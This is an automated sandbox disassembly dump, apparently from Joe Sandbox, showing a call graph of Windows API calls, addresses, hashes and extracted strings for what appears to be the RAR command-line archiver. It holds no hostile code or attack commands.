GetProcAddress 39190->39191 39192 7ff74eea7e45 39190->39192 39193 7ff74eebb4ae 39191->39193 39194 7ff74eebb4cb GetProcAddress 39191->39194 39195 7ff74ee87a68 39192->39195 39193->39194 39194->39192 39196 7ff74ee87a76 39195->39196 39216 7ff74eed2ae4 39196->39216 39198 7ff74ee87a80 39199 7ff74eed2ae4 setbuf 60 API calls 39198->39199 39200 7ff74ee87a94 39199->39200 39225 7ff74ee87b44 GetStdHandle GetFileType 39200->39225 39203 7ff74ee87b44 3 API calls 39204 7ff74ee87aae 39203->39204 39205 7ff74ee87b44 3 API calls 39204->39205 39207 7ff74ee87abe 39205->39207 39206 7ff74ee87b12 39215 7ff74ee8cd78 SetConsoleCtrlHandler 39206->39215 39209 7ff74ee87aeb 39207->39209 39228 7ff74eed2abc 31 API calls 2 library calls 39207->39228 39209->39206 39230 7ff74eed2abc 31 API calls 2 library calls 39209->39230 39210 7ff74ee87adf 39229 7ff74eed2b40 33 API calls 3 library calls 39210->39229 39213 7ff74ee87b06 39231 7ff74eed2b40 33 API calls 3 library calls 39213->39231 39217 7ff74eed2ae9 39216->39217 39218 7ff74eed7ee8 39217->39218 39221 7ff74eed7f23 39217->39221 39232 7ff74eed4f3c 15 API calls _set_errno_from_matherr 39218->39232 39220 7ff74eed7eed 39233 7ff74eed4e1c 31 API calls _invalid_parameter_noinfo 39220->39233 39234 7ff74eed7d98 60 API calls 2 library calls 39221->39234 39224 7ff74eed7ef8 39224->39198 39226 7ff74ee87b61 GetConsoleMode 39225->39226 39227 7ff74ee87a9e 39225->39227 39226->39227 39227->39203 39228->39210 39229->39209 39230->39213 39231->39206 39232->39220 39233->39224 39234->39224 39235 7ff74ee73b53 39236 7ff74ee73b64 39235->39236 39285 7ff74ee91e80 39236->39285 39237 7ff74ee73c09 39297 7ff74ee923f0 39237->39297 39238 7ff74ee73bb6 39238->39237 39240 7ff74ee73c18 39238->39240 39241 7ff74ee73c01 39238->39241 39307 7ff74ee78050 157 API calls 39240->39307 39302 7ff74ee91c24 39241->39302 39243 7ff74ee73c90 39324 7ff74eebd400 48 API calls 39243->39324 39245 7ff74ee73c3d 39308 7ff74ee78010 13 API calls 39245->39308 39246 7ff74ee73ccc 39246->39243 39315 7ff74ee92414 61 API calls 39246->39315 39249 7ff74ee73c45 39252 7ff74ee73c54 39249->39252 39309 7ff74ee8cba8 75 API calls 39249->39309 39251 7ff74ee73cf9 39316 7ff74ee91998 138 API calls 39251->39316 39310 7ff74ee7a9d4 186 API calls wcschr 39252->39310 39256 7ff74ee73c5c 39311 7ff74ee793ac 8 API calls 39256->39311 39257 7ff74ee73d10 39317 7ff74ee918ac 39257->39317 39260 7ff74ee73c66 39262 7ff74ee73c77 39260->39262 39312 7ff74ee8ca40 61 API calls _CxxThrowException 39260->39312 39313 7ff74ee78090 8 API calls 39262->39313 39266 7ff74ee73c7f 39266->39243 39314 7ff74ee8ca40 61 API calls _CxxThrowException 39266->39314 39286 7ff74ee91e95 pre_c_initialization 39285->39286 39287 7ff74ee91ecb CreateFileW 39286->39287 39288 7ff74ee91f59 GetLastError 39287->39288 39289 7ff74ee91fb8 39287->39289 39325 7ff74eea4534 39288->39325 39290 7ff74ee91ff7 39289->39290 39292 7ff74ee91fd9 SetFileTime 39289->39292 39294 7ff74eeca610 _handle_error 8 API calls 39290->39294 39292->39290 39296 7ff74ee9203a 39294->39296 39295 7ff74ee91f78 CreateFileW GetLastError 39295->39289 39296->39238 39340 7ff74ee924e8 39297->39340 39300 7ff74ee9240e 39300->39246 39303 7ff74ee91c37 39302->39303 39304 7ff74ee91c3b 39302->39304 39303->39237 39304->39303 39305 7ff74ee91c5d 39304->39305 39357 7ff74ee92d6c 12 API calls 2 library calls 39305->39357 39307->39245 39308->39249 39310->39256 39311->39260 39312->39262 39313->39266 39314->39243 39315->39251 39316->39257 39318 7ff74ee918ca 39317->39318 39323 7ff74ee918db 39317->39323 39319 7ff74ee918d6 39318->39319 39320 7ff74ee918de 39318->39320 39318->39323 39321 7ff74ee91c24 12 API calls 39319->39321 39358 7ff74ee91930 39320->39358 39321->39323 39323->39243 39326 7ff74eea4549 pre_c_initialization 39325->39326 39336 7ff74eea45a2 39326->39336 39337 7ff74eea472c CharUpperW 39326->39337 39328 7ff74eea4579 39338 7ff74eea4760 CharUpperW 39328->39338 39329 7ff74eeca610 _handle_error 8 API calls 39330 7ff74ee91f74 39329->39330 39330->39289 39330->39295 39332 7ff74eea4592 39333 7ff74eea459a 39332->39333 39334 7ff74eea4629 GetCurrentDirectoryW 39332->39334 39339 7ff74eea472c CharUpperW 39333->39339 39334->39336 39336->39329 39337->39328 39338->39332 39339->39336 39346 7ff74ee91af0 39340->39346 39343 7ff74ee923f9 39343->39300 39345 7ff74ee8ca40 61 API calls _CxxThrowException 39343->39345 39345->39300 39347 7ff74ee91b01 pre_c_initialization 39346->39347 39348 7ff74ee91b6f CreateFileW 39347->39348 39349 7ff74ee91b68 39347->39349 39348->39349 39350 7ff74ee91be1 39349->39350 39351 7ff74eea4534 10 API calls 39349->39351 39354 7ff74eeca610 _handle_error 8 API calls 39350->39354 39352 7ff74ee91bb3 39351->39352 39352->39350 39353 7ff74ee91bb7 CreateFileW 39352->39353 39353->39350 39355 7ff74ee91c14 39354->39355 39355->39343 39356 7ff74ee8ca08 10 API calls 39355->39356 39356->39343 39357->39303 39360 7ff74ee9194c 39358->39360 39361 7ff74ee91964 39358->39361 39359 7ff74ee91988 39359->39323 39360->39361 39362 7ff74ee91958 CloseHandle 39360->39362 39361->39359 39364 7ff74ee8c9d0 10 API calls 39361->39364 39362->39361 39364->39359 39365 7ff74ee71884 39497 7ff74eea34e4 39365->39497 39368 7ff74ee71926 39370 7ff74ee7195b 39368->39370 39561 7ff74eea3f98 63 API calls 2 library calls 39368->39561 39369 7ff74eea34e4 CompareStringW 39371 7ff74ee718a6 39369->39371 39377 7ff74ee71970 39370->39377 39562 7ff74ee92ed8 100 API calls 3 library calls 39370->39562 39373 7ff74eea34e4 CompareStringW 39371->39373 39379 7ff74ee718b9 39371->39379 39373->39379 39376 7ff74ee71915 39560 7ff74ee8ca40 61 API calls _CxxThrowException 39376->39560 39380 7ff74ee719b8 39377->39380 39563 7ff74eeb49f4 48 API calls 39377->39563 39379->39368 39559 7ff74ee71168 8 API calls 2 library calls 39379->39559 39501 7ff74ee75450 39380->39501 39382 7ff74ee719b0 39564 7ff74ee88444 54 API calls fflush 39382->39564 39388 7ff74ee772c4 76 API calls 39395 7ff74ee71a12 39388->39395 39389 7ff74ee71ae6 39535 7ff74ee77514 39389->39535 39390 7ff74ee71b04 39539 7ff74ee86c94 39390->39539 39393 7ff74ee71af2 39394 7ff74ee77514 72 API calls 39393->39394 39396 7ff74ee71aff 39394->39396 39395->39389 39395->39390 39397 7ff74eeca610 _handle_error 8 API calls 39396->39397 39399 7ff74ee72f97 39397->39399 39398 7ff74ee71b13 39555 7ff74ee77148 39398->39555 39401 7ff74ee71c71 39402 7ff74ee763e8 8 API calls 39401->39402 39406 7ff74ee71ca7 39401->39406 39405 7ff74ee71c91 39402->39405 39403 7ff74ee71ce4 39407 7ff74eeca444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39403->39407 39404 7ff74ee71cd5 39409 7ff74eeca444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39404->39409 39408 7ff74ee749b8 99 API calls 39405->39408 39406->39403 39406->39404 39413 7ff74ee71cee 39407->39413 39410 7ff74ee71c9d 39408->39410 39409->39413 39411 7ff74ee763e8 8 API calls 39410->39411 39411->39406 39412 7ff74ee71d50 39415 7ff74eeca444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39412->39415 39413->39412 39414 7ff74eebde30 72 API calls 39413->39414 39414->39412 39416 7ff74ee71d62 39415->39416 39417 7ff74eebdbd0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39416->39417 39418 7ff74ee71d7b 39416->39418 39417->39418 39419 7ff74eec2bcc 66 API calls 39418->39419 39420 7ff74ee71dba 39419->39420 39492 7ff74ee9ae10 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39420->39492 39421 7ff74ee71e1c 39423 7ff74ee710c0 8 API calls 39421->39423 39425 7ff74ee71e5d 39421->39425 39422 7ff74ee71dde std::bad_alloc::bad_alloc 39422->39421 39424 7ff74eecba34 _CxxThrowException RtlPcToFileHeader RaiseException 39422->39424 39423->39425 39424->39421 39426 7ff74ee7a410 159 API calls 39425->39426 39491 7ff74ee71ef4 39425->39491 39426->39491 39427 7ff74ee72d0c 39429 7ff74eebde30 72 API calls 39427->39429 39438 7ff74ee72d21 39427->39438 39428 7ff74ee72ccc 39428->39427 39496 7ff74ee98c80 72 API calls 39428->39496 39429->39438 39430 7ff74ee96688 48 API calls 39430->39491 39431 7ff74ee72d86 39435 7ff74eeb49f4 48 API calls 39431->39435 39471 7ff74ee72dd0 39431->39471 39432 7ff74eebb6d0 73 API calls 39489 7ff74ee72005 39432->39489 39433 7ff74ee88444 54 API calls 39433->39489 39434 7ff74ee75e70 169 API calls 39434->39489 39440 7ff74ee72d9e 39435->39440 39436 7ff74ee7a504 208 API calls 39436->39471 39437 7ff74ee780e4 192 API calls 39437->39471 39438->39431 39441 7ff74eeb49f4 48 API calls 39438->39441 39439 7ff74ee7e6c8 157 API calls 39439->39491 39443 7ff74ee88444 54 API calls 39440->39443 39445 7ff74ee72d6c 39441->39445 39442 7ff74ee75928 237 API calls 39442->39489 39446 7ff74ee72da6 39443->39446 39444 7ff74ee97c7c 127 API calls 39444->39471 39447 7ff74eeb49f4 48 API calls 39445->39447 39454 7ff74ee91c24 12 API calls 39446->39454 39451 7ff74ee72d79 39447->39451 39448 7ff74ee8e21c 63 API calls 39448->39489 39449 7ff74ee71168 8 API calls 39449->39471 39450 7ff74ee7b540 147 API calls 39450->39491 39452 7ff74ee88444 54 API calls 39451->39452 39452->39431 39453 7ff74ee965b4 48 API calls 39453->39491 39454->39471 39455 7ff74ee7a4d0 12 API calls 39455->39491 39456 7ff74ee94554 16 API calls 39456->39491 39457 7ff74ee91998 138 API calls 39457->39491 39458 7ff74eebae50 71 API calls 39461 7ff74ee72e39 39458->39461 39459 7ff74ee733b4 64 API calls 39459->39471 39460 7ff74ee75db4 46 API calls 39460->39491 39461->39458 39462 7ff74ee8ca40 61 API calls 39461->39462 39461->39471 39462->39471 39463 7ff74ee76188 231 API calls 39463->39471 39464 7ff74ee91e80 15 API calls 39464->39491 39465 7ff74ee97c7c 127 API calls 39465->39491 39466 7ff74ee91930 11 API calls 39466->39491 39467 7ff74ee73f74 138 API calls 39467->39471 39468 7ff74ee7b540 147 API calls 39468->39489 39469 7ff74eeaba9c 195 API calls 39469->39471 39470 7ff74eeb49f4 48 API calls 39470->39471 39471->39436 39471->39437 39471->39444 39471->39449 39471->39459 39471->39461 39471->39463 39471->39467 39471->39469 39471->39470 39473 7ff74ee88444 54 API calls 39471->39473 39472 7ff74ee75004 49 API calls 39472->39491 39473->39471 39474 7ff74ee7571c 12 API calls 39474->39491 39475 7ff74ee918ac 15 API calls 39475->39491 39476 7ff74ee71168 8 API calls 39476->39491 39477 7ff74eebd48c 58 API calls 39477->39491 39478 7ff74ee7a410 159 API calls 39478->39491 39479 7ff74ee75e70 169 API calls 39479->39491 39480 7ff74ee89be0 14 API calls 39480->39491 39481 7ff74eebc0a8 10 API calls 39481->39491 39482 7ff74ee96378 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39482->39491 39483 7ff74eea97f0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 39483->39491 39484 7ff74ee8cbd0 75 API calls 39484->39491 39485 7ff74ee95c0c 237 API calls 39485->39491 39486 7ff74ee95d40 237 API calls 39486->39491 39487 7ff74ee76114 216 API calls 39487->39491 39488 7ff74eeb49f4 48 API calls 39488->39489 39489->39432 39489->39433 39489->39434 39489->39442 39489->39448 39489->39468 39489->39488 39489->39491 39490 7ff74ee95708 237 API calls 39490->39491 39491->39428 39491->39430 39491->39439 39491->39450 39491->39453 39491->39455 39491->39456 39491->39457 39491->39460 39491->39464 39491->39465 39491->39466 39491->39472 39491->39474 39491->39475 39491->39476 39491->39477 39491->39478 39491->39479 39491->39480 39491->39481 39491->39482 39491->39483 39491->39484 39491->39485 39491->39486 39491->39487 39491->39489 39491->39490 39493 7ff74ee9a250 237 API calls 39491->39493 39494 7ff74ee9aae0 237 API calls 39491->39494 39495 7ff74ee80d60 237 API calls 39491->39495 39492->39422 39493->39491 39494->39489 39495->39489 39496->39427 39498 7ff74eea34f6 39497->39498 39499 7ff74ee71893 39498->39499 39565 7ff74eebdac0 CompareStringW 39498->39565 39499->39369 39499->39379 39502 7ff74ee7546f pre_c_initialization 39501->39502 39503 7ff74ee7554a __scrt_fastfail 39502->39503 39505 7ff74ee75588 __scrt_fastfail 39502->39505 39507 7ff74eebc0a8 10 API calls 39503->39507 39506 7ff74ee75583 39505->39506 39566 7ff74ee73210 39505->39566 39572 7ff74ee87088 39505->39572 39576 7ff74ee7681c 39505->39576 39587 7ff74eeb7a24 39505->39587 39606 7ff74ee7571c 39505->39606 39614 7ff74ee84380 14 API calls 39505->39614 39595 7ff74ee76eb8 39506->39595 39509 7ff74ee75576 39507->39509 39511 7ff74ee7681c 54 API calls 39509->39511 39511->39506 39512 7ff74ee756e9 39602 7ff74eeb6f68 39512->39602 39514 7ff74ee756f6 39515 7ff74eeca610 _handle_error 8 API calls 39514->39515 39516 7ff74ee719df 39515->39516 39521 7ff74ee772c4 39516->39521 39522 7ff74ee772eb 39521->39522 39718 7ff74ee888dc 39522->39718 39524 7ff74ee77302 39722 7ff74eea915c 39524->39722 39526 7ff74ee7730f 39734 7ff74eea7044 39526->39734 39529 7ff74eeca444 new 4 API calls 39530 7ff74ee773e3 39529->39530 39532 7ff74ee773f5 __scrt_fastfail 39530->39532 39739 7ff74ee9894c 39530->39739 39533 7ff74ee89be0 14 API calls 39532->39533 39534 7ff74ee71a01 39533->39534 39534->39388 39536 7ff74ee77539 39535->39536 39765 7ff74eea922c 39536->39765 39540 7ff74ee86cbc 39539->39540 39541 7ff74ee86d45 39539->39541 39543 7ff74ee86cd9 39540->39543 39776 7ff74eea9f78 8 API calls 2 library calls 39540->39776 39542 7ff74ee86d83 39541->39542 39544 7ff74ee86d69 39541->39544 39781 7ff74eea9f78 8 API calls 2 library calls 39541->39781 39542->39398 39546 7ff74ee86cf3 39543->39546 39777 7ff74eea9f78 8 API calls 2 library calls 39543->39777 39544->39542 39782 7ff74eea9f78 8 API calls 2 library calls 39544->39782 39550 7ff74ee86d0d 39546->39550 39778 7ff74eea9f78 8 API calls 2 library calls 39546->39778 39553 7ff74ee86d2b 39550->39553 39779 7ff74eea9f78 8 API calls 2 library calls 39550->39779 39553->39542 39780 7ff74eea9f78 8 API calls 2 library calls 39553->39780 39556 7ff74ee77167 39555->39556 39557 7ff74ee77162 39555->39557 39783 7ff74ee76c64 130 API calls _handle_error 39557->39783 39559->39376 39560->39368 39561->39370 39562->39377 39563->39382 39564->39380 39565->39499 39567 7ff74ee732e9 39566->39567 39568 7ff74ee73231 39566->39568 39567->39505 39568->39567 39615 7ff74ee84380 14 API calls 39568->39615 39570 7ff74ee7329c 39570->39567 39616 7ff74ee92a20 22 API calls 2 library calls 39570->39616 39573 7ff74ee870a4 39572->39573 39575 7ff74ee870c5 39573->39575 39617 7ff74ee98558 10 API calls 2 library calls 39573->39617 39575->39505 39618 7ff74ee76714 39576->39618 39578 7ff74ee76836 39579 7ff74ee76853 39578->39579 39629 7ff74eed48c0 39578->39629 39579->39505 39582 7ff74ee768a9 std::bad_alloc::bad_alloc 39637 7ff74eecba34 RtlPcToFileHeader RaiseException 39582->39637 39584 7ff74ee768c4 39638 7ff74ee77188 12 API calls 39584->39638 39586 7ff74ee768eb 39586->39505 39588 7ff74eeb7a59 39587->39588 39593 7ff74eeb7a4f 39587->39593 39589 7ff74eeb7a7c 39588->39589 39592 7ff74eeb7b1c 60 API calls 39588->39592 39588->39593 39645 7ff74eeb71fc 39588->39645 39678 7ff74ee841b0 14 API calls 2 library calls 39588->39678 39677 7ff74eebb6d0 73 API calls _Init_thread_footer 39589->39677 39592->39588 39593->39505 39596 7ff74ee76ee6 39595->39596 39601 7ff74ee76f5c 39595->39601 39711 7ff74eeb9f64 8 API calls memcpy_s 39596->39711 39598 7ff74ee76efb 39599 7ff74ee76f2f 39598->39599 39598->39601 39599->39598 39712 7ff74ee77188 12 API calls 39599->39712 39601->39512 39603 7ff74eeb6fb4 39602->39603 39605 7ff74eeb6f8a 39602->39605 39604 7ff74ee94538 FindClose 39604->39605 39605->39603 39605->39604 39607 7ff74ee75742 39606->39607 39612 7ff74ee7575d 39606->39612 39607->39612 39717 7ff74eea3520 12 API calls 2 library calls 39607->39717 39611 7ff74ee757fc 39611->39505 39713 7ff74eea3610 39612->39713 39613 7ff74eea48bc 8 API calls 39613->39611 39614->39505 39615->39570 39616->39567 39617->39573 39619 7ff74ee76738 39618->39619 39628 7ff74ee767a7 memcpy_s 39618->39628 39620 7ff74ee76765 39619->39620 39639 7ff74ee8ca6c 48 API calls 2 library calls 39619->39639 39624 7ff74ee767e1 39620->39624 39625 7ff74ee76786 39620->39625 39622 7ff74ee76759 39640 7ff74ee8cb64 8 API calls 39622->39640 39624->39628 39642 7ff74ee8cb64 8 API calls 39624->39642 39625->39628 39641 7ff74ee8cb64 8 API calls 39625->39641 39628->39578 39630 7ff74ee7684b 39629->39630 39631 7ff74eed48f5 39629->39631 39630->39579 39630->39582 39631->39630 39643 7ff74eed7094 31 API calls 2 library calls 39631->39643 39633 7ff74eed4924 39633->39630 39634 7ff74eed492d 39633->39634 39644 7ff74eed4e3c 16 API calls abort 39634->39644 39637->39584 39638->39586 39639->39622 39643->39633 39653 7ff74eeb7217 pre_c_initialization 39645->39653 39646 7ff74eeb73c5 39679 7ff74ee945cc 39646->39679 39647 7ff74eeca610 _handle_error 8 API calls 39649 7ff74eeb776f 39647->39649 39649->39588 39651 7ff74eeb7453 39654 7ff74eeb7476 39651->39654 39655 7ff74eeb7464 39651->39655 39652 7ff74eeb729c 39664 7ff74eeb73bb 39652->39664 39665 7ff74eeb732e 39652->39665 39653->39646 39653->39652 39671 7ff74eeb725a 39653->39671 39686 7ff74ee94554 39653->39686 39673 7ff74eeb7496 39654->39673 39683 7ff74ee94538 39654->39683 39694 7ff74eeb7c38 55 API calls 3 library calls 39655->39694 39657 7ff74eeb76ef 39657->39671 39697 7ff74ee98558 10 API calls 2 library calls 39657->39697 39659 7ff74eeb7471 39659->39654 39662 7ff74eeb7342 39662->39657 39662->39671 39674 7ff74eeb7656 39662->39674 39695 7ff74ee84380 14 API calls 39662->39695 39666 7ff74eeca444 new 4 API calls 39664->39666 39665->39662 39667 7ff74eeb734a 39665->39667 39666->39646 39668 7ff74eeb737e 39667->39668 39667->39671 39692 7ff74ee84380 14 API calls 39667->39692 39668->39671 39693 7ff74ee8cbd0 75 API calls 39668->39693 39669 7ff74ee94554 16 API calls 39669->39671 39671->39647 39673->39669 39673->39671 39674->39657 39674->39671 39675 7ff74eeb7723 39674->39675 39696 7ff74ee7c214 8 API calls 2 library calls 39675->39696 39678->39588 39682 7ff74ee945ed 39679->39682 39680 7ff74ee946b2 39680->39651 39680->39662 39681 7ff74ee946ec 15 API calls 39681->39682 39682->39680 39682->39681 39684 7ff74ee9454f 39683->39684 39685 7ff74ee94549 FindClose 39683->39685 39684->39673 39685->39684 39687 7ff74ee94570 39686->39687 39688 7ff74ee94574 39687->39688 39698 7ff74ee946ec 39687->39698 39688->39652 39691 7ff74ee9458d FindClose 39691->39688 39692->39668 39693->39671 39694->39659 39695->39674 39696->39671 39697->39671 39699 7ff74ee94705 pre_c_initialization 39698->39699 39700 7ff74ee94733 FindFirstFileW 39699->39700 39701 7ff74ee947a4 FindNextFileW 39699->39701 39702 7ff74ee9478b 39700->39702 39704 7ff74ee94749 39700->39704 39701->39702 39703 7ff74ee947ae GetLastError 39701->39703 39706 7ff74eeca610 _handle_error 8 API calls 39702->39706 39703->39702 39705 7ff74eea4534 10 API calls 39704->39705 39707 7ff74ee9475b 39705->39707 39708 7ff74ee94587 39706->39708 39709 7ff74ee9475f FindFirstFileW 39707->39709 39710 7ff74ee9477a GetLastError 39707->39710 39708->39688 39708->39691 39709->39702 39709->39710 39710->39702 39711->39598 39712->39599 39715 7ff74eea3626 pre_c_initialization wcschr 39713->39715 39714 7ff74eeca610 _handle_error 8 API calls 39716 7ff74ee757e1 39714->39716 39715->39714 39716->39611 39716->39613 39717->39612 39719 7ff74ee88919 39718->39719 39744 7ff74eeb4b14 39719->39744 39721 7ff74ee88954 __scrt_fastfail 39721->39524 39723 7ff74eea9199 39722->39723 39724 7ff74eeca480 4 API calls 39723->39724 39725 7ff74eea91be 39724->39725 39726 7ff74eeca444 new 4 API calls 39725->39726 39727 7ff74eea91cf 39726->39727 39728 7ff74eea91e1 39727->39728 39729 7ff74ee888dc 8 API calls 39727->39729 39730 7ff74eeca444 new 4 API calls 39728->39730 39729->39728 39731 7ff74eea91f7 39730->39731 39732 7ff74eea9209 39731->39732 39733 7ff74ee888dc 8 API calls 39731->39733 39732->39526 39733->39732 39735 7ff74ee888dc 8 API calls 39734->39735 39736 7ff74eea7063 39735->39736 39737 7ff74eea72c0 4 API calls 39736->39737 39738 7ff74ee77325 39737->39738 39738->39529 39738->39532 39749 7ff74eeb7d80 39739->39749 39745 7ff74eeb4b26 39744->39745 39746 7ff74eeb4b2b 39744->39746 39748 7ff74eeb4b38 8 API calls _handle_error 39745->39748 39746->39721 39748->39746 39756 7ff74eeb8094 39749->39756 39752 7ff74ee98a44 39753 7ff74ee98a5a __scrt_fastfail 39752->39753 39760 7ff74eebbac4 39753->39760 39757 7ff74eeb809f 39756->39757 39758 7ff74eeb7ec8 68 API calls 39757->39758 39759 7ff74ee9896e 39758->39759 39759->39752 39763 7ff74eebba70 GetCurrentProcess GetProcessAffinityMask 39760->39763 39764 7ff74ee989c5 39763->39764 39764->39532 39766 7ff74eea9245 39765->39766 39773 7ff74ee96194 72 API calls 39766->39773 39768 7ff74eea92b1 39774 7ff74ee96194 72 API calls 39768->39774 39770 7ff74eea92bd 39775 7ff74ee96194 72 API calls 39770->39775 39772 7ff74eea92c9 39773->39768 39774->39770 39775->39772 39776->39543 39777->39546 39778->39550 39779->39553 39780->39541 39781->39544 39782->39542 39783->39556 39784 7ff74ee73e71 39785 7ff74ee73e89 39784->39785 39786 7ff74ee73e81 39784->39786 39788 7ff74ee73edd 39785->39788 39789 7ff74ee73ea3 39785->39789 39795 7ff74eec9a14 49 API calls 39786->39795 39791 7ff74eeca610 _handle_error 8 API calls 39788->39791 39796 7ff74ee9331c 48 API calls 2 library calls 39789->39796 39792 7ff74ee73eef 39791->39792 39793 7ff74ee73eab 39793->39788 39797 7ff74ee763e8 8 API calls 2 library calls 39793->39797 39795->39785 39796->39793 39797->39788 39798 7ff74ee782f0 39799 7ff74ee78306 39798->39799 39811 7ff74ee7836f 39798->39811 39800 7ff74ee78324 39799->39800 39803 7ff74ee78371 39799->39803 39799->39811 39826 7ff74ee92414 61 API calls 39800->39826 39802 7ff74ee78347 39827 7ff74ee91998 138 API calls 39802->39827 39803->39811 39828 7ff74ee91998 138 API calls 39803->39828 39806 7ff74ee7835e 39807 7ff74ee918ac 15 API calls 39806->39807 39807->39811 39809 7ff74ee7b540 147 API calls 39810 7ff74ee7854f 39809->39810 39812 7ff74ee78578 39810->39812 39814 7ff74ee7b540 147 API calls 39810->39814 39821 7ff74ee7a410 39811->39821 39813 7ff74ee7b540 147 API calls 39812->39813 39818 7ff74ee7858f 39813->39818 39814->39812 39815 7ff74ee78634 39816 7ff74eeca610 _handle_error 8 API calls 39815->39816 39817 7ff74ee78663 39816->39817 39818->39815 39829 7ff74ee79628 175 API calls 39818->39829 39830 7ff74eea7a68 39821->39830 39824 7ff74ee7853a 39824->39809 39826->39802 39827->39806 39828->39811 39829->39815 39832 7ff74eea7a8d 39830->39832 39837 7ff74ee7a434 39830->39837 39831 7ff74eea7aaf 39833 7ff74ee922e0 12 API calls 39831->39833 39831->39837 39832->39831 39843 7ff74eea7340 157 API calls 39832->39843 39835 7ff74eea7adf 39833->39835 39836 7ff74ee92440 12 API calls 39835->39836 39836->39837 39837->39824 39838 7ff74ee922e0 39837->39838 39844 7ff74ee920b4 39838->39844 39841 7ff74ee92307 39841->39824 39843->39831 39845 7ff74ee92130 39844->39845 39848 7ff74ee920d0 39844->39848 39845->39841 39849 7ff74ee8cd00 10 API calls 39845->39849 39846 7ff74ee92102 SetFilePointer 39846->39845 39847 7ff74ee92126 GetLastError 39846->39847 39847->39845 39848->39846
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
                                                                                                                                                                                                                              • API String ID: 0-1628410872
                                                                                                                                                                                                                              • Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                                                                              • Instruction ID: 1cf28cc1ed9762fcc1d1c5344c37d58eee7732e4e98eab68bc42232bc7b1d585
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33C28B62D0C1E3C5FA64BB2481442BDB691BB017A4FD98D35CA4E4B2C6DEEDE948C371
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
                                                                                                                                                                                                                              • API String ID: 0-1660254149
